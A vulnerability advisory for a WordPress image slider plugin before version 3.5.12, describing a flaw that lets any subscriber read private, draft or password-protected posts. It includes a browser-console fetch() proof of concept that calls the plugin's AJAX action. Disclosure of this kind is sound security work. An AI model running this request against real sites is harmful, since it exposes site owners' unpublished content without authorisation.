Slider - Ultimate Responsive Image Slider < 3.5.12 - Subscriber+ Arbitrary Post Access

2023-11-2300:00:00

Krzysztof Zając (CERT PL)

slider vulnerability

arbitrary post access

developer console.

AI Score

6.9

Confidence

Low

EPSS

0.001

Percentile

18.1%

JSON

Description The plugin does not ensure that posts to be accessed via an AJAX action are slides and can be viewed by the user making the request, allowing any authenticated users, such as subscriber to access the content arbitrary post such as private, draft and password protected

Run the below command in the developer console of the web browser while being on the blog as subscriber user (4 being the ID of a private/draft/password protected post)

fetch("/wp-admin/admin-ajax.php?action=uris_get_thumbnail", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
   },
  "body": "imageid=4",
  "method": "POST",
}).then((response) => {return response.text();    })
    .then((data) => {
      console.log(data);
    })

The content of the post will be displayed in the rpgp_image_desc textarea.